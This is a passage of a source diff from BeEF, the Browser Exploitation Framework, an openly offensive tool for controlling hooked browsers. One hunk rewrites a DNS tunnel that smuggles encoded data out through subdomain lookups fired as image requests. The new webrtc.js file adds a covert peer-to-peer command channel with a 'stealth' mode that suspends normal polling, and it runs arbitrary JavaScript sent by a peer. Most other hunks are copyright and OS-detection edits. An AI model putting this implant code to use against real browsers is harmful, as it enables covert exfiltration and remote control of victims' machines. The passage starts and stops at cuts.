+        // o Domain names are limited to 255 characters in length (including dots)
+        // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
+        // o Subdomains are limited to 63 characters in length (including the trailing dot)
 
-		// sends a DNS request
-		sendQuery = function(query) {
-			beef.debug("Requesting: "+query);
-			var img = new Image;
-			img.src = "http://"+query;
-			img.onload = function() { dom.removeChild(this); }
-			img.onerror = function() { dom.removeChild(this); }
-			dom.appendChild(img);
-		};
+        // DNS request structure:
+        // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
+      //max_length: 3.   3   .   3   . 63 . x
 
-		// encode message
-		var xor_key = Math.floor(Math.random()*99000+1000);
-		encoded_message = encodeURI(xor_encrypt(messageString, xor_key)).replace(/%/g,".");
+        // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
+        // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
+        var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
+        var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
+        var max_data_segment_length = 63; // by RFC
 
-		// Split message into segments
-		segments = encoded_message.chunk(max_segment_length)
-		for (seq=1; seq<=segments.length; seq++) {
-			// send segment
-			sendQuery(msgId+"."+seq+"."+segments.length+"."+xor_key+segments[seq-1]+"."+domain);
-		}
+        //TODO remove this
+        console.log("max_data_segment_length: " + max_data_segment_length);
+
+        var dom = document.createElement('b');
+
+        String.prototype.chunk = function(n) {
+            if (typeof n=='undefined') n=100;
+            return this.match(RegExp('.{1,'+n+'}','g'));
+        };
+
+        var sendQuery = function(query) {
+            var img = new Image;
+            //img.src = "http://"+query;
+            img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
+            img.onload = function() { dom.removeChild(this); }
+            img.onerror = function() { dom.removeChild(this); }
+            dom.appendChild(img);
+
+            //experimental
+            //setTimeout(function(){dom.removeChild(img)},1000);
+        };
+
+        var segments = encodedData.chunk(max_data_segment_length);
+
+        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
+
+        //TODO remove this
+        console.log(segments.length);
+
+        for (var seq=1; seq<=segments.length; seq++) {
+            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
+        }
 
 		// callback - returns the number of queries sent
 		if (!!callback) callback(segments.length);

core/main/client/net/local.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/portscanner.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/requester.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/os.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -14,14 +14,18 @@ beef.os = {
 	  * http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
 	  */
 	getDefaultBrowser: function() {
-		var mt = document.mimeType;
 		var result = "Unknown"
-		if (mt) {
-			if (mt == "Safari Document")       result = "Safari";
-			if (mt == "Firefox HTML Document") result = "Firefox";
-			if (mt == "Chrome HTML Document")  result = "Chrome";
-			if (mt == "HTML Document")         result = "Internet Explorer";
-			if (mt == "Opera Web Document")    result = "Opera";
+		try {
+			var mt = document.mimeType;
+			if (mt) {
+				if (mt == "Safari Document")       result = "Safari";
+				if (mt == "Firefox HTML Document") result = "Firefox";
+				if (mt == "Chrome HTML Document")  result = "Chrome";
+				if (mt == "HTML Document")         result = "Internet Explorer";
+				if (mt == "Opera Web Document")    result = "Opera";
+			}
+		} catch (e) {
+			beef.debug("[os] getDefaultBrowser: "+e.message);
 		}
 		return result;
 	},
@@ -75,6 +79,10 @@ beef.os = {
 
 	isWin8: function() {
 		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},	
+	
+	isWin81: function() {
+		return (this.ua.match('(Windows NT 6.3)')) ? true : false;
 	},
 	
 	isOpenBSD: function() {
@@ -134,7 +142,7 @@ beef.os = {
 	},
 
 	isWindows: function() {
-		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
+		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWin81() || this.isWinPhone();
 	},
 	
 	getName: function() {
@@ -152,6 +160,7 @@ beef.os = {
 		if(this.isWinVista())      return 'Windows Vista';
 		if(this.isWin7())          return 'Windows 7';
 		if(this.isWin8())          return 'Windows 8';
+		if(this.isWin81())         return 'Windows 8.1';
 
 		//Nokia
 		if(this.isNokia()) {

core/main/client/session.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/timeout.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/updater.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -79,7 +79,7 @@ beef.updater = {
 			try {
 				command();
 			} catch(e) {
-				console.error('execute_commands - command failed to execute: ' + e.message);
+				beef.debug('execute_commands - command failed to execute: ' + e.message);
                 // prints the command source to be executed, to better trace errors
                 // beef.client_debug must be enabled in the main config
                 beef.debug(command.toString());

core/main/client/webrtc.js

@@ -0,0 +1,588 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+/**
+ * @Literal object: beef.webrtc
+ *
+ * Manage the WebRTC peer to peer communication channels.
+ * This objects contains all the necessary client-side WebRTC components,
+ * allowing browsers to use WebRTC to communicate with each other.
+ * To provide signaling, the WebRTC extension sets up custom listeners.
+ *  /rtcsignal - for sending RTC signalling information between peers
+ *  /rtcmessage - for client-side rtc messages to be submitted back into beef and logged.
+ *
+ * To ensure signaling gets back to the peers, the hook.js dynamic construction also includes
+ * the signalling.
+ *
+ * This is all mostly a Proof of Concept
+ */
+
+beefrtcs = {}; // To handle multiple peers - we need to have a hash of Beefwebrtc objects
+               // The key is the peer id
+globalrtc = {}; // To handle multiple Peers - we have to have a global hash of RTCPeerConnection objects
+                // these objects persist outside of everything else 
+                // The key is the peer id
+rtcstealth = false; // stealth should only be initiated from one peer - this global variable will contain:
+                    // false - i.e not stealthed; or
+                    // <peerid> - i.e. the id of the browser which initiated stealth mode
+rtcrecvchan = {}; // To handle multiple event channels - we need to have a global hash of these
+                  // The key is the peer id
+
+// Beefwebrtc object - wraps everything together for a peer connection
+// One of these per peer connection, and will be stored in the beefrtc global hash
+function Beefwebrtc(initiator,peer,turnjson,stunservers,verbparam) {
+    this.verbose = typeof verbparam !== 'undefined' ? verbparam : false; // whether this object is verbose or not
+    this.initiator = typeof initiator !== 'undefined' ? initiator : 0; // if 1 - this is the caller; if 0 - this is the receiver
+    this.peerid = typeof peer !== 'undefined' ? peer : null; // id of this rtc peer
+    this.turnjson = turnjson; // set of TURN servers in the format:
+                              // {"username": "<username", "password": "<password>", "uris": [
+                              //    "turn:<ip>:<port>?transport=<udp/tcp>",
+                              //    "turn:<ip>:<port>?transport=<udp/tcp>"]}
+    this.started = false; // Has signaling / dialing started for this peer
+    this.gotanswer = false; // For the caller - this determines whether they have received an SDP answer from the receiver
+    this.turnDone = false; // does the pcConfig have TURN servers added to it?
+    this.signalingReady = false; // the initiator (Caller) is always ready to signal. So this sets to true during init
+                                 // the receiver will set this to true once it receives an SDP 'offer'
+    this.msgQueue = []; // because the handling of SDP signals may happen in any order - we need a queue for them
+    this.pcConfig = null; // We set this during init
+    this.pcConstraints = {"optional": [{"googImprovedWifiBwe": true}]} // PeerConnection constraints
+    this.offerConstraints = {"optional": [], "mandatory": {}}; // Default SDP Offer Constraints - used in the caller
+    this.sdpConstraints = {'optional': [{'RtpDataChannels':true}]}; // Default SDP Constraints - used by caller and receiver
+    this.gatheredIceCandidateTypes = { Local: {}, Remote: {} }; // ICE Candidates
+    this.allgood = false; // Is this object / peer connection with the nominated peer ready to go?
+    this.dataChannel = null; // The data channel used by this peer
+    this.stunservers = stunservers; // set of STUN servers, in the format:
+                                    // ["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302"]
+}
+
+// Initialize the object
+Beefwebrtc.prototype.initialize = function() {
+  if (this.peerid == null) {
+    return 0; // no peerid - NO DICE
+  }
+
+  // Initialise the pcConfig hash with the provided stunservers
+  var stuns = JSON.parse(this.stunservers);
+  this.pcConfig = {"iceServers": [{"urls":stuns}]};
+
+  // We're not getting the browsers to request their own TURN servers, we're specifying them through BeEF
+  this.forceTurn(this.turnjson);
+
+  // Caller is always ready to create peerConnection.
+  this.signalingReady = this.initiator;
+
+  // Start .. maybe 
+  this.maybeStart();
+
+  // If the window is closed, send a signal to beef .. this is not all that great, so just commenting out
+  // window.onbeforeunload = function() {
+  //   this.sendSignalMsg({type: 'bye'});
+  // }
+
+  return 1; // because .. yeah .. we had a peerid - this is good yar.
+}
+
+//Forces the TURN configuration (we can't query that computeengine thing because it's CORS is restrictive)
+//These values are now simply passed in from the config.yaml for the webrtc extension
+Beefwebrtc.prototype.forceTurn = function(jason) {
+    var turnServer = JSON.parse(jason);
+    var iceServers = createIceServers(turnServer.uris,
+                                      turnServer.username,
+                                      turnServer.password);
+    if (iceServers !== null) {
+        this.pcConfig.iceServers = this.pcConfig.iceServers.concat(iceServers);
+    }
+    if (this.verbose) {console.log("Got TURN servers, will try and maybestart again..");}
+    this.turnDone = true;
+    this.maybeStart();
+}
+
+// Try and establish the RTC connection
+Beefwebrtc.prototype.createPeerConnection = function() {
+  if (this.verbose) {
+      console.log('Creating RTCPeerConnnection with the following options:\n' +
+                '  config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
+                '  constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
+    }
+  try {
+    // Create an RTCPeerConnection via the polyfill (webrtcadapter.js).
+    globalrtc[this.peerid] = new RTCPeerConnection(this.pcConfig, this.pcConstraints);
+    globalrtc[this.peerid].onicecandidate = this.onIceCandidate;
+    if (this.verbose) {
+      console.log('Created RTCPeerConnnection with the following options:\n' +
+                '  config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
+                '  constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
+    }
+  } catch (e) {
+    if (this.verbose) {
+      console.log('Failed to create PeerConnection, exception: ');
+      console.log(e);
+    }
+    return;
+  }
+
+  // Assign event handlers to signalstatechange, iceconnectionstatechange, datachannel etc
+  globalrtc[this.peerid].onsignalingstatechange = this.onSignalingStateChanged;
+  globalrtc[this.peerid].oniceconnectionstatechange = this.onIceConnectionStateChanged;
+  globalrtc[this.peerid].ondatachannel = this.onDataChannel;
+  this.dataChannel = globalrtc[this.peerid].createDataChannel("sendDataChannel", {reliable:false});
+}
+
+// When the PeerConnection receives a new ICE Candidate
+Beefwebrtc.prototype.onIceCandidate = function(event) {
+  var peerid = null;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].allgood === false) {
+      peerid = beefrtcs[k].peerid;
+    }
+  }
+
+  if (beefrtcs[peerid].verbose) {
+    console.log("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
+    console.log(event);
+  }
+
+  if (event.candidate) {
+    // Send the candidate to the peer via the BeEF signalling channel
+    beefrtcs[peerid].sendSignalMsg({type: 'candidate',
+                 label: event.candidate.sdpMLineIndex,
+                 id: event.candidate.sdpMid,
+                 candidate: event.candidate.candidate});
+    // Note this ICE candidate locally
+    beefrtcs[peerid].noteIceCandidate("Local", beefrtcs[peerid].iceCandidateType(event.candidate.candidate));
+  } else {
+    if (beefrtcs[peerid].verbose) {console.log('End of candidates.');}
+  }
+}
+
+// For all rtc signalling messages we receive as part of hook.js polling - we have to process them with this function
+// This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
+// against the message directly
+Beefwebrtc.prototype.processMessage = function(message) {
+  if (this.verbose) {
+    console.log('Signalling Message - S->C: ' + JSON.stringify(message));
+  }
+  var msg = JSON.parse(message);
+
+  if (!this.initiator && !this.started) { // We are currently the receiver AND we have NOT YET received an SDP Offer
+    if (this.verbose) {console.log('processing the message, as a receiver');}
+    if (msg.type === 'offer') { // This IS an SDP Offer
+      if (this.verbose) {console.log('.. and the message is an offer .. ');}
+      this.msgQueue.unshift(msg); // put it on the top of the msgqueue
+      this.signalingReady = true; // As the receiver, we've now got an SDP Offer, so lets set signalingReady to true
+      this.maybeStart(); // Lets try and start again - this will end up with calleeStart() getting executed
+    } else { // This is NOT an SDP Offer - as the receiver, just add it to the queue
+      if (this.verbose) {console.log(' .. the message is NOT an offer .. ');}
+      this.msgQueue.push(msg);
+    }
+  } else if (this.initiator && !this.gotanswer) { // We are currently the caller AND we have NOT YET received the SDP Answer
+    if (this.verbose) {console.log('processing the message, as the sender, no answers yet');}
+    if (msg.type === 'answer') { // This IS an SDP Answer
+        if (this.verbose) {console.log('.. and we have an answer ..');}
+        this.processSignalingMessage(msg); // Process the message directly
+        this.gotanswer = true; // We have now received an answer
+        //process all other queued message...
+        while (this.msgQueue.length > 0) {
+            this.processSignalingMessage(this.msgQueue.shift());
+        }
+    } else { // This is NOT an SDP Answer - as the caller, just add it to the queue
+        if (this.verbose) {console.log('.. not an answer ..');}
+        this.msgQueue.push(msg);
+    }
+  } else { // For all other messages just drop them in the queue
+    if (this.verbose) {console.log('processing a message, but, not as a receiver, OR, the rtc is already up');}
+    this.processSignalingMessage(msg);
+  } 
+}
+
+// Send a signalling message .. 
+Beefwebrtc.prototype.sendSignalMsg = function(message) {
+  var msgString = JSON.stringify(message);
+  if (this.verbose) {console.log('Signalling Message - C->S: ' + msgString);}
+  beef.net.send('/rtcsignal',0,{targetbeefid: this.peerid, signal: msgString});
+}
+
+// Used to record ICS candidates locally
+Beefwebrtc.prototype.noteIceCandidate = function(location, type) {
+  if (this.gatheredIceCandidateTypes[location][type])
+    return;
+  this.gatheredIceCandidateTypes[location][type] = 1;
+  // updateInfoDiv();
+}
+
+// When the signalling state changes. We don't actually do anything with this except log it.
+Beefwebrtc.prototype.onSignalingStateChanged = function(event) {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+
+  if (localverbose === true) {console.log("Signalling has changed to: " + event.target.signalingState);}
+}
+
+// When the ICE Connection State changes - this is useful to determine connection statuses with peers.
+Beefwebrtc.prototype.onIceConnectionStateChanged = function(event) {
+  var peerid = null;
+
+  for (k in globalrtc) {
+    if ((globalrtc[k].localDescription.sdp === event.target.localDescription.sdp) && (globalrtc[k].localDescription.type === event.target.localDescription.type)) {
+      peerid = k;
+    }
+  }
+
+  if (beefrtcs[peerid].verbose) {console.log("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);}
+
+  // ICE Connection Status has connected - this is good. Normally means the RTCPeerConnection is ready! Although may still look for 
+  // better candidates or connections
+  if (event.target.iceConnectionState === 'connected') {
+    //Send status to peer
+    window.setTimeout(function() {
+        beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
+        beefrtcs[peerid].allgood = true;
+        },1000);
+  }
+
+  // Completed is similar to connected. Except, each of the ICE components are good, and no more testing remote candidates is done.
+  if (event.target.iceConnectionState === 'completed') {
+    window.setTimeout(function() {
+      beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
+      beefrtcs[peerid].allgood = true;
+    },1000);
+  }
+
+  if ((rtcstealth == peerid) && (event.target.iceConnectionState === 'disconnected')) {
+    //I was in stealth mode, talking back to this peer - but it's gone offline.. come out of stealth
+    rtcstealth = false;
+    beefrtcs[peerid].allgood = false;
+    beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
+  } else if ((rtcstealth == false) && (event.target.iceConnectionState === 'disconnected')) {
+    //I was not in stealth, and this peer has gone offline - send a message
+    beefrtcs[peerid].allgood = false;
+    beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
+  }
+  // We don't handle situations where a stealthed peer loses a peer that is NOT the peer that made it go into stealth
+  // This is possibly a bad idea - @xntrik
+
+
+}
+
+// This is the function when a peer tells us to go into stealth by sending a dataChannel message of "!gostealth"
+Beefwebrtc.prototype.goStealth = function() {
+    //stop the beef updater
+    rtcstealth = this.peerid; // this is a global variable
+    beef.updater.lock = true;
+    this.sendPeerMsg('Going into stealth mode');
+
+    setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 3);
+}
+
+// This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it
+rtcpollPeer = function() {
+    if (rtcstealth == false) {
+        //my peer has disabled stealth mode
+        beef.updater.lock = false;
+        return;
+    }
+
+    if (beefrtcs[rtcstealth].verbose) {console.log('lub dub');}
+
+    beefrtcs[rtcstealth].sendPeerMsg('Stayin alive'); // This is the heartbeat we send back to the peer that made us stealth
+
+    setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 3);
+}
+
+// When a data channel has been established - within here is the message handling function as well
+Beefwebrtc.prototype.onDataChannel = function(event) {
+  var peerid = null;
+  for (k in globalrtc) {
+    if ((globalrtc[k].localDescription.sdp === event.currentTarget.localDescription.sdp) && (globalrtc[k].localDescription.type === event.currentTarget.localDescription.type)) {
+      peerid = k;
+    }
+  }
+
+  if (beefrtcs[peerid].verbose) {console.log("Peer: " + peerid + " has just handled the onDataChannel event");}
+  rtcrecvchan[peerid] = event.channel;
+
+  // This is the onmessage event handling within the datachannel
+  rtcrecvchan[peerid].onmessage = function(ev2) {
+    if (beefrtcs[peerid].verbose) {console.log("Received an RTC message from my peer["+peerid+"]: " + ev2.data);}
+
+    // We've received the command to go into stealth mode
+    if (ev2.data == "!gostealth") {
+        if (beef.updater.lock == true) {
+            setTimeout(function() {beefrtcs[peerid].goStealth()},beef.updater.xhr_poll_timeout * 0.4);
+        } else {
+            beefrtcs[peerid].goStealth();
+        }
+
+    // The message to come out of stealth
+    } else if (ev2.data == "!endstealth") {
+
+      if (rtcstealth != null) {
+        beefrtcs[rtcstealth].sendPeerMsg("Coming out of stealth...");
+        rtcstealth = false;
+      }
+
+    // Command to perform arbitrary JS (while stealthed)
+    } else if ((rtcstealth != false) && (ev2.data.charAt(0) == "%")) {
+      if (beefrtcs[peerid].verbose) {console.log('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');}
+      beefrtcs[rtcstealth].sendPeerMsg("Command result - " + beefrtcs[rtcstealth].execCmd(ev2.data.substring(1)));
+
+    // Command to perform arbitrary JS (while NOT stealthed)
+    } else if ((rtcstealth == false) && (ev2.data.charAt(0) == "%")) {
+      if (beefrtcs[peerid].verbose) {console.log('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));}
+      beefrtcs[peerid].sendPeerMsg("Command result - " + beefrtcs[peerid].execCmd(ev2.data.substring(1)));
+
+    // Just a plain text message .. (while stealthed)
+    } else if (rtcstealth != false) {
+      if (beefrtcs[peerid].verbose) {console.log('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');}
+      beefrtcs[rtcstealth].sendPeerMsg(ev2.data);
+
+    // Just a plan text message (while NOT stealthed)
+    } else {
+      if (beefrtcs[peerid].verbose) {console.log('received a message from peer['+peerid+'] - sending it back to beef');}
+      beef.net.send('/rtcmessage',0,{peerid: peerid, message: ev2.data});
+    }
+  } 
+}
+
+// How the browser executes received JS (this is pretty hacky)
+Beefwebrtc.prototype.execCmd = function(input) {
+  var fn = new Function(input);
+  var res = fn();
+  return res.toString();
+}
+
+// Shortcut function to SEND a data messsage
+Beefwebrtc.prototype.sendPeerMsg = function(msg) {
+  if (this.verbose) {console.log('sendPeerMsg to ' + this.peerid);}
+  this.dataChannel.send(msg);
+}
+
+// Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready
+Beefwebrtc.prototype.maybeStart = function() {
+  if (this.verbose) {console.log("maybe starting ... ");}
+
+  if (!this.started && this.signalingReady && this.turnDone) {
+    if (this.verbose) {console.log('Creating PeerConnection.');}
+    this.createPeerConnection();
+
+    this.started = true;
+
+    if (this.initiator) {
+      if (this.verbose) {console.log("Making the call now .. bzz bzz");}
+      this.doCall();
+    } else {
+      if (this.verbose) {console.log("Receiving a call now .. somebuddy answer da fone?");}
+      this.calleeStart();
+    }
+
+  } else {
+    if (this.verbose) {console.log("Not ready to start just yet..");}
+  }
+}
+
+// RTC - create an offer - the caller runs this, while the receiver runs calleeStart()
+Beefwebrtc.prototype.doCall = function() {
+  var constraints = this.mergeConstraints(this.offerConstraints, this.sdpConstraints);
+  var self = this;
+  globalrtc[this.peerid].createOffer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, constraints);
+  if (this.verbose) {console.log('Sending offer to peer, with constraints: \n' +
+              '  \'' + JSON.stringify(constraints) + '\'.');}
+}
+
+// Helper method to merge SDP constraints
+Beefwebrtc.prototype.mergeConstraints = function(cons1, cons2) {
+  var merged = cons1;
+  for (var name in cons2.mandatory) {
+    merged.mandatory[name] = cons2.mandatory[name];
+  }
+  merged.optional.concat(cons2.optional);
+  return merged;
+}
+
+// Sets the local RTC session description, sends this information back (via signalling)
+// The caller uses this to set it's local description, and it then has to send this to the peer (via signalling)
+// The receiver uses this information too - and vice-versa - hence the signaling
+Beefwebrtc.prototype.setLocalAndSendMessage = function(sessionDescription) {
+  // This fucking function does NOT receive a 'this' state, and you can't pass additional parameters
+  // Stupid .. javascript :(
+  // So I'm hacking it to find the peerid gah - I believe *this* is what means you can't establish peers concurrently
+  // i.e. this browser will have to wait for this peerconnection to establish before attempting to connect to the next one..
+  var peerid = null;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].allgood === false) {
+      peerid = beefrtcs[k].peerid;
+    }
+  }
+  if (beefrtcs[peerid].verbose) {console.log("For peer: " + peerid + " Running setLocalAndSendMessage...");}
+
+  globalrtc[peerid].setLocalDescription(sessionDescription, onSetSessionDescriptionSuccess, onSetSessionDescriptionError);
+  beefrtcs[peerid].sendSignalMsg(sessionDescription);
+
+  function onSetSessionDescriptionSuccess() {
+    if (beefrtcs[peerid].verbose) {console.log('Set session description success.');}
+  }
+
+  function onSetSessionDescriptionError() {
+    if (beefrtcs[peerid].verbose) {console.log('Failed to set session description');}
+  }
+}
+
+// If the browser can't build an SDP
+Beefwebrtc.prototype.onCreateSessionDescriptionError = function(error) {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+  if (localverbose === true) {console.log('Failed to create session description: ' + error.toString());}
+}
+
+// Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()
+Beefwebrtc.prototype.calleeStart = function() {
+  // Callee starts to process cached offer and other messages.
+  while (this.msgQueue.length > 0) {
+    this.processSignalingMessage(this.msgQueue.shift());
+  }
+}
+
+// Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers
+Beefwebrtc.prototype.processSignalingMessage = function(message) {
+  if (!this.started) {
+    if (this.verbose) {console.log('peerConnection has not been created yet!');}
+    return;
+  }
+
+  if (message.type === 'offer') {
+    if (this.verbose) {console.log("Processing signalling message: OFFER");}
+    this.setRemote(message);
+    this.doAnswer();
+  } else if (message.type === 'answer') {
+    if (this.verbose) {console.log("Processing signalling message: ANSWER");}
+    this.setRemote(message);
+  } else if (message.type === 'candidate') {
+    if (this.verbose) {console.log("Processing signalling message: CANDIDATE");}
+    var candidate = new RTCIceCandidate({sdpMLineIndex: message.label,
+                                         candidate: message.candidate});
+    this.noteIceCandidate("Remote", this.iceCandidateType(message.candidate));
+    globalrtc[this.peerid].addIceCandidate(candidate, this.onAddIceCandidateSuccess, this.onAddIceCandidateError);
+  } else if (message.type === 'bye') {
+    this.onRemoteHangup();
+  }
+}
+
+// Used to set the RTC remote session
+Beefwebrtc.prototype.setRemote = function(message) {
+    globalrtc[this.peerid].setRemoteDescription(new RTCSessionDescription(message),
+       onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
+
+  function onSetRemoteDescriptionSuccess() {
+    if (this.verbose) {console.log("Set remote session description success.");}
+  }
+}
+
+// As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below
+Beefwebrtc.prototype.doAnswer = function() {
+  if (this.verbose) {console.log('Sending answer to peer.');}
+  globalrtc[this.peerid].createAnswer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, this.sdpConstraints);
+}
+
+// Helper method to determine what kind of ICE Candidate we've received
+Beefwebrtc.prototype.iceCandidateType = function(candidateSDP) {
+  if (candidateSDP.indexOf("typ relay ") >= 0)
+    return "TURN";
+  if (candidateSDP.indexOf("typ srflx ") >= 0)
+    return "STUN";
+  if (candidateSDP.indexOf("typ host ") >= 0)
+    return "HOST";
+  return "UNKNOWN";
+}
+
+// Event handler for successful addition of ICE Candidates
+Beefwebrtc.prototype.onAddIceCandidateSuccess = function() {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+  if (localverbose === true) {console.log('AddIceCandidate success.');}
+}
+
+// Event handler for unsuccessful addition of ICE Candidates
+Beefwebrtc.prototype.onAddIceCandidateError = function(error) {
+  var localverbose = false;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].verbose === true) {
+      localverbose = true;
+    }
+  }
+  if (localverbose === true) {console.log('Failed to add Ice Candidate: ' + error.toString());}
+}
+
+// If a peer hangs up (we bring down the peerconncetion via the stop() method)
+Beefwebrtc.prototype.onRemoteHangup = function() {
+  if (this.verbose) {console.log('Session terminated.');}
+  this.initiator = 0;
+  // transitionToWaiting();
+  this.stop();
+}
+
+// Bring down the peer connection
+Beefwebrtc.prototype.stop = function() {
+  this.started = false; // we're no longer started
+  this.signalingReady = false; // signalling isn't ready
+  globalrtc[this.peerid].close(); // close the RTCPeerConnection option
+  globalrtc[this.peerid] = null; // Remove it
+  this.msgQueue.length = 0; // clear the msgqueue
+  rtcstealth = false; // no longer stealth
+  this.allgood = false; // allgood .. NAH UH
+}
+
+// The actual beef.webrtc wrapper - this exposes only two functions directly - start, and status
+// These are the methods which are executed via the custom extension of the hook.js
+beef.webrtc = {
+  // Start the RTCPeerConnection process
+  start: function(initiator,peer,turnjson,stunservers,verbose) {
+    if (peer in beefrtcs) {
+      // If the RTC peer is not in a good state, try kickng it off again
+      // This is possibly not the correct way to handle this issue though :/ I.e. we'll now have TWO of these objects :/
+      if (beefrtcs[peer].allgood == false) {
+        beefrtcs[peer] = new Beefwebrtc(initiator, peer, turnjson, stunservers, verbose);
+        beefrtcs[peer].initialize();
+      }
+    } else {
+      // Standard behaviour for new peer connections
+      beefrtcs[peer] = new Beefwebrtc(initiator,peer,turnjson, stunservers, verbose);
+      beefrtcs[peer].initialize();
+    }
+  },
+
+  // Check the status of all my peers .. 
+  status: function(me) {
+    if (Object.keys(beefrtcs).length > 0) {
+      for (var k in beefrtcs) {
+        if (beefrtcs.hasOwnProperty(k)) {
+          beef.net.send('/rtcmessage',0,{peerid: k, message: "Status checking - allgood: " + beefrtcs[k].allgood});
+        }
+      }
+    } else {
+      beef.net.send('/rtcmessage',0,{peerid: me, message: "No peers?"});
+    }
+  }
+}
+beef.regCmp('beef.webrtc');

core/main/client/websocket.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
